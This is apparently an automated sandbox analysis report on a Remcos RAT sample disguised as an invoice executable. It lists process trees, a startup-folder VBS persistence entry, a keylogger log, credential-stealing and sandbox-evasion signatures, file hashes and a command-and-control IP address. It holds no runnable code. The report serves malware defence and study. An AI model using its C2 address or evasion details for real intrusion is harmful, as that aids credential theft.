                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron112
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567452 Sample: z49FACTURA-0987678.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 47 geoplugin.net 2->47 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 11 other signatures 2->67 10 z49FACTURA-0987678.exe 4 2->10         started        14 wscript.exe 1 2->14         started        signatures3 process4 file5 45 C:\Users\user\AppData\Local\...\turbinals.exe, PE32 10->45 dropped 83 Binary is likely a compiled AutoIt script file 10->83 85 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->85 16 turbinals.exe 2 10->16         started        87 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->87 20 turbinals.exe 1 14->20         started        signatures6 process7 file8 41 C:\Users\user\AppData\...\turbinals.vbs, data 16->41 dropped 53 Multi AV Scanner detection for dropped file 16->53 55 Binary is likely a compiled AutoIt script file 16->55 57 Machine Learning detection for dropped file 16->57 59 2 other signatures 16->59 22 turbinals.exe 3 17 16->22         started        27 turbinals.exe 1 20->27         started        signatures9 process10 dnsIp11 49 192.210.150.26, 49703, 49704, 8787 AS-COLOCROSSINGUS United States 22->49 51 geoplugin.net 178.237.33.50, 49710, 80 ATOM86-ASATOM86NL Netherlands 22->51 43 C:\ProgramData\remcos\logs.dat, data 22->43 dropped 75 Detected Remcos RAT 22->75 77 Binary is likely a compiled AutoIt script file 22->77 79 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 22->79 81 Maps a DLL or memory area into another process 22->81 29 turbinals.exe 1 22->29         started        32 turbinals.exe 1 22->32         started        34 turbinals.exe 2 22->34         started        36 turbinals.exe 1 27->36         started        file12 signatures13 process14 signatures15 89 Tries to steal Instant Messenger accounts or passwords 29->89 91 Tries to harvest and steal browser information (history, passwords, etc) 29->91 93 Tries to steal Mail credentials (via file / registry access) 32->93 95 Binary is likely a compiled AutoIt script file 36->95 97 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 36->97 38 turbinals.exe 1 36->38         started        process16 signatures17 69 Detected Remcos RAT 38->69 71 Binary is likely a compiled AutoIt script file 38->71 73 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 38->73

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    z49FACTURA-0987678.exe26%ReversingLabsWin32.Trojan.AutoitInject
                    z49FACTURA-0987678.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\acceptancy\turbinals.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\acceptancy\turbinals.exe26%ReversingLabsWin32.Trojan.AutoitInject

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?82954a9491e844512441fcdc0%Avira URL Cloudsafe
                    https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?8595da0e88f921ab004541910%Avira URL Cloudsafe
                    http://www.imvu.coma0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://geoplugin.net/json.gpfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/json.gp$turbinals.exe, 00000003.00000002.3758634982.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364321509.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364486252.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1384020768.0000000001520000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.office.com/bhv7BD7.tmp.5.drfalse
                            		high
                            http://www.imvu.comrturbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              		high
                              https://aefd.nelreports.net/api/report?cat=bingthbhv7BD7.tmp.5.drfalse
                                		high
                                https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?8595da0e88f921ab00454191bhv7BD7.tmp.5.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.imvu.comturbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371634572.000000000173D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://aefd.nelreports.net/api/report?cat=wsbbhv7BD7.tmp.5.drfalse
                                    		high
                                    http://www.imvu.comaturbinals.exe, 00000007.00000002.1371634572.000000000173D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.nirsoft.netturbinals.exe, 00000005.00000002.1381486653.0000000000BF3000.00000004.00000010.00020000.00000000.sdmpfalse
                                      		high
                                      https://aefd.nelreports.net/api/report?cat=bingaotakbhv7BD7.tmp.5.drfalse
                                        		high
                                        https://deff.nelreports.net/api/report?cat=msnbhv7BD7.tmp.5.drfalse
                                          		high
                                          http://geoplugin.net/json.gpl6turbinals.exe, 00000003.00000002.3758634982.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364321509.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364486252.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1384020768.0000000001520000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://geoplugin.net/json.gpSystem32turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comturbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                		high
                                                https://www.google.comturbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5b&FrontEnd=AFbhv7BD7.tmp.5.drfalse
                                                    		high
                                                    https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELbhv7BD7.tmp.5.drfalse
                                                      		high
                                                      https://aefd.nelreports.net/api/report?cat=bingaotbhv7BD7.tmp.5.drfalse
                                                        		high
                                                        http://geoplugin.net/json.gp/Cturbinals.exe, 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://maps.windows.com/windows-app-web-linkbhv7BD7.tmp.5.drfalse
                                                            		high
                                                            https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?82954a9491e844512441fcdcbhv7BD7.tmp.5.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://aefd.nelreports.net/api/report?cat=bingrmsbhv7BD7.tmp.5.drfalse
                                                              		high
                                                              http://www.nirsoft.net/turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://www.ebuddy.comturbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  192.210.150.26
                                                                  		unknownUnited States
                                                                  		36352AS-COLOCROSSINGUStrue
                                                                  178.237.33.50
                                                                  		geoplugin.netNetherlands
                                                                  		8455ATOM86-ASATOM86NLfalse

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1567452
                                                                  Start date and time:2024-12-03 15:39:11 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 10m 17s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:17
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:z49FACTURA-0987678.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.phis.troj.spyw.expl.evad.winEXE@20/14@1/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 54
                                                                  • Number of non-executed functions: 284
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • VT rate limit hit for: z49FACTURA-0987678.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  09:40:43API Interceptor6294266x Sleep call for process: turbinals.exe modified
                                                                  15:40:13AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  192.210.150.26FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                                                    Rgh99876k7e.exeGet hashmaliciousRemcosBrowse
                                                                      SALKI098765R400.exeGet hashmaliciousRemcosBrowse
                                                                        FTE98767800000.bat.exeGet hashmaliciousRemcosBrowse
                                                                          178.237.33.50LBzGgy6rnu.docGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          EIuz8Bk9kGav2ix.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • geoplugin.net/json.gp
                                                                          1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          173317191746333e83fd715fcd29456f316941f504021238a7f0f8ba4a89827b03f83d6aba395.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          INTECH RFQ EN241813.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                          • geoplugin.net/json.gp

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          geoplugin.netLBzGgy6rnu.docGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          EIuz8Bk9kGav2ix.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 178.237.33.50
                                                                          1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          173317191746333e83fd715fcd29456f316941f504021238a7f0f8ba4a89827b03f83d6aba395.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          INTECH RFQ EN241813.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                          • 178.237.33.50

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          AS-COLOCROSSINGUSEIuz8Bk9kGav2ix.exeGet hashmaliciousRemcosBrowse
                                                                          • 192.3.64.152
                                                                          a-r.m-6.SNOOPY.elfGet hashmaliciousGafgytBrowse
                                                                          • 192.3.179.33
                                                                          FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                                                          • 192.210.150.26
                                                                          INTECH RFQ EN241813.exeGet hashmaliciousRemcosBrowse
                                                                          • 104.168.7.16
                                                                          https://a.rs6.net/1/pc?ep=e4f2f4ad2c30fbb2SK2ZyQxbsE02cV3UOfuPD-JxSRgUD6Y86mFtUF3WRqjeuMrz9o3Xbb320wCTDsWWUHuFG0qWroCiniptiREBdHyyzdrPc45m6t-HBEB7SZ8gZX4dYr4o80JwDUJz1eSGQlrcb9as_P_3jZu-t-DrRTdQARm9vPjp5IAqdyzm4bLxpaVnP8_0eRiLoUggvzge&c=$%7bContact.encryptedContactId%7dGet hashmaliciousHTMLPhisherBrowse
                                                                          • 206.217.129.92
                                                                          seemebestgoodluckthings.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                          • 172.245.123.12
                                                                          PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                          • 172.245.123.12
                                                                          la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                          • 107.175.186.126
                                                                          m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 107.174.8.80
                                                                          bot.x86_64.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          • 107.175.32.137
                                                                          ATOM86-ASATOM86NLLBzGgy6rnu.docGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          EIuz8Bk9kGav2ix.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 178.237.33.50
                                                                          1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          173317191746333e83fd715fcd29456f316941f504021238a7f0f8ba4a89827b03f83d6aba395.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          INTECH RFQ EN241813.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                          • 178.237.33.50

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\ProgramData\remcos\logs.dat

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):292
                                                                          Entropy (8bit):3.4230866799314166
                                                                          Encrypted:false
                                                                          SSDEEP:6:6lZMj5YcIeeDAlOWA41gWA7DxbN2fxlBgWMm0v:6lSec0WIWItN2LBgWMl
                                                                          MD5:7B2EF1EF2433E0342990F5D389BEED17
                                                                          SHA1:13477943853B94360C3A00967B0DED6A4B06D0D8
                                                                          SHA-256:FFE35A7D58E8FB9EB785DD4C144EF6B38732330CDBDF734B2B136759D12326F6
                                                                          SHA-512:8225C627FD0DBE758323F7C334A6A0FA071D326AD4EBC8DBC995E6645A8A60C58202E66CD4FD08393D6479DB42D34C1C4365D51BEF649251459489C91709137D
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                          Reputation:low
                                                                          Preview:....[.2.0.2.4./.1.2./.0.3. .0.9.:.4.0.:.1.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.1.2.7.2. .m.i.n.u.t.e.s. .}.....

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):963
                                                                          Entropy (8bit):5.014904284428935
                                                                          Encrypted:false
                                                                          SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                          MD5:B66CFB6461E507BB577CDE91F270844E
                                                                          SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                                          SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                                          SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                          C:\Users\user\AppData\Local\Temp\aut5CD6.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\z49FACTURA-0987678.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):423920
                                                                          Entropy (8bit):7.985721489448969
                                                                          Encrypted:false
                                                                          SSDEEP:12288:m0mJL7t81uJw6rSocqtehC7lYi6/MDFsc9XZ:mLtJw6LcDhC7lYiXXRZ
                                                                          MD5:FBBAB074EA1BC72A76E7E17D4546F64A
                                                                          SHA1:B7E164E3BD18C016F162808550B250EDDC9CCD46
                                                                          SHA-256:64ADDCBF4C12AF13CC30A75208952AB12B2A66CCEC42DD6D65297BD067733E54
                                                                          SHA-512:D4C3DCD1DDCB9D5BA519F71C49A4F63D72554930174F0C727A7F6D6CFA6E50ED3142DB7C84F666646FF45914A6A46F1A545577DFFAC6AD405BBDB206C41B8483
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:EA06.....X..Z}..W.T.W:.0.T.U9..kL.....2.1.L)..y....s.m..Y..iU......T.....%.^..).W4.[*r..ryM.U.6.D..s...X...>...i...~.L..3...~.~6........W.......-....W.x=...o.|.9^?..o.`....eI..a...n...uoX.wJ+......&.......&..s....,^.A..n.v....q.................-u......q.4u....7I.&.1.E&....T.s..6.J..*.J..f..Z`S..2...H. ..2aH......2.Z..h.Jd..w.Z]..S...:aH..r.......(..(`*..iS.eH..L..x........*....T.@1.6..>......Z.Y....UR.i..9.lrO\.P@..U...1.EZeS...|6...g..Te......Uf3."...Ng..H.g.r..o..D.]6..&...6.2......p.G..&..,.IB..... ..R.Ng...#S6......\j.B.J&.i.3as..13..2...F.`.?..ar........UJ.~.w`.Z.^...G*...b.S..0..D......tI.....h%.............aV..d..$Ze..D&..f{p...5i.W'.]j..M.Iq.....l.!1.],...+.R..~`.,"..rt..X....[`u..R.0.N.....Z..j.....k.S;.z..Q.Va4..^1P.@2.f&Am...3.-2.2..".M..-O.Dr.....5.q8.i..4.r<V..,...Fz...H...F.>..l-..F....K...G....pm@.GV...G...Gf.......F....t...9b.y.r$.@.B*......3..9...&....@..P..9...&.........9.....W.ri`.WggO.T.R...k.._j..V.cy.S&..m~-9.s.T..;.9.x<..\.AQ..

                                                                          C:\Users\user\AppData\Local\Temp\aut6002.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):423920
                                                                          Entropy (8bit):7.985721489448969
                                                                          Encrypted:false
                                                                          SSDEEP:12288:m0mJL7t81uJw6rSocqtehC7lYi6/MDFsc9XZ:mLtJw6LcDhC7lYiXXRZ
                                                                          MD5:FBBAB074EA1BC72A76E7E17D4546F64A
                                                                          SHA1:B7E164E3BD18C016F162808550B250EDDC9CCD46
                                                                          SHA-256:64ADDCBF4C12AF13CC30A75208952AB12B2A66CCEC42DD6D65297BD067733E54
                                                                          SHA-512:D4C3DCD1DDCB9D5BA519F71C49A4F63D72554930174F0C727A7F6D6CFA6E50ED3142DB7C84F666646FF45914A6A46F1A545577DFFAC6AD405BBDB206C41B8483
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:EA06.....X..Z}..W.T.W:.0.T.U9..kL.....2.1.L)..y....s.m..Y..iU......T.....%.^..).W4.[*r..ryM.U.6.D..s...X...>...i...~.L..3...~.~6........W.......-....W.x=...o.|.9^?..o.`....eI..a...n...uoX.wJ+......&.......&..s....,^.A..n.v....q.................-u......q.4u....7I.&.1.E&....T.s..6.J..*.J..f..Z`S..2...H. ..2aH......2.Z..h.Jd..w.Z]..S...:aH..r.......(..(`*..iS.eH..L..x........*....T.@1.6..>......Z.Y....UR.i..9.lrO\.P@..U...1.EZeS...|6...g..Te......Uf3."...Ng..H.g.r..o..D.]6..&...6.2......p.G..&..,.IB..... ..R.Ng...#S6......\j.B.J&.i.3as..13..2...F.`.?..ar........UJ.~.w`.Z.^...G*...b.S..0..D......tI.....h%.............aV..d..$Ze..D&..f{p...5i.W'.]j..M.Iq.....l.!1.],...+.R..~`.,"..rt..X....[`u..R.0.N.....Z..j.....k.S;.z..Q.Va4..^1P.@2.f&Am...3.-2.2..".M..-O.Dr.....5.q8.i..4.r<V..,...Fz...H...F.>..l-..F....K...G....pm@.GV...G...Gf.......F....t...9b.y.r$.@.B*......3..9...&....@..P..9...&.........9.....W.ri`.WggO.T.R...k.._j..V.cy.S&..m~-9.s.T..;.9.x<..\.AQ..

                                                                          C:\Users\user\AppData\Local\Temp\aut6542.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):423920
                                                                          Entropy (8bit):7.985721489448969
                                                                          Encrypted:false
                                                                          SSDEEP:12288:m0mJL7t81uJw6rSocqtehC7lYi6/MDFsc9XZ:mLtJw6LcDhC7lYiXXRZ
                                                                          MD5:FBBAB074EA1BC72A76E7E17D4546F64A
                                                                          SHA1:B7E164E3BD18C016F162808550B250EDDC9CCD46
                                                                          SHA-256:64ADDCBF4C12AF13CC30A75208952AB12B2A66CCEC42DD6D65297BD067733E54
                                                                          SHA-512:D4C3DCD1DDCB9D5BA519F71C49A4F63D72554930174F0C727A7F6D6CFA6E50ED3142DB7C84F666646FF45914A6A46F1A545577DFFAC6AD405BBDB206C41B8483
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:EA06.....X..Z}..W.T.W:.0.T.U9..kL.....2.1.L)..y....s.m..Y..iU......T.....%.^..).W4.[*r..ryM.U.6.D..s...X...>...i...~.L..3...~.~6........W.......-....W.x=...o.|.9^?..o.`....eI..a...n...uoX.wJ+......&.......&..s....,^.A..n.v....q.................-u......q.4u....7I.&.1.E&....T.s..6.J..*.J..f..Z`S..2...H. ..2aH......2.Z..h.Jd..w.Z]..S...:aH..r.......(..(`*..iS.eH..L..x........*....T.@1.6..>......Z.Y....UR.i..9.lrO\.P@..U...1.EZeS...|6...g..Te......Uf3."...Ng..H.g.r..o..D.]6..&...6.2......p.G..&..,.IB..... ..R.Ng...#S6......\j.B.J&.i.3as..13..2...F.`.?..ar........UJ.~.w`.Z.^...G*...b.S..0..D......tI.....h%.............aV..d..$Ze..D&..f{p...5i.W'.]j..M.Iq.....l.!1.],...+.R..~`.,"..rt..X....[`u..R.0.N.....Z..j.....k.S;.z..Q.Va4..^1P.@2.f&Am...3.-2.2..".M..-O.Dr.....5.q8.i..4.r<V..,...Fz...H...F.>..l-..F....K...G....pm@.GV...G...Gf.......F....t...9b.y.r$.@.B*......3..9...&....@..P..9...&.........9.....W.ri`.WggO.T.R...k.._j..V.cy.S&..m~-9.s.T..;.9.x<..\.AQ..

                                                                          C:\Users\user\AppData\Local\Temp\aut92AB.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):423920
                                                                          Entropy (8bit):7.985721489448969
                                                                          Encrypted:false
                                                                          SSDEEP:12288:m0mJL7t81uJw6rSocqtehC7lYi6/MDFsc9XZ:mLtJw6LcDhC7lYiXXRZ
                                                                          MD5:FBBAB074EA1BC72A76E7E17D4546F64A
                                                                          SHA1:B7E164E3BD18C016F162808550B250EDDC9CCD46
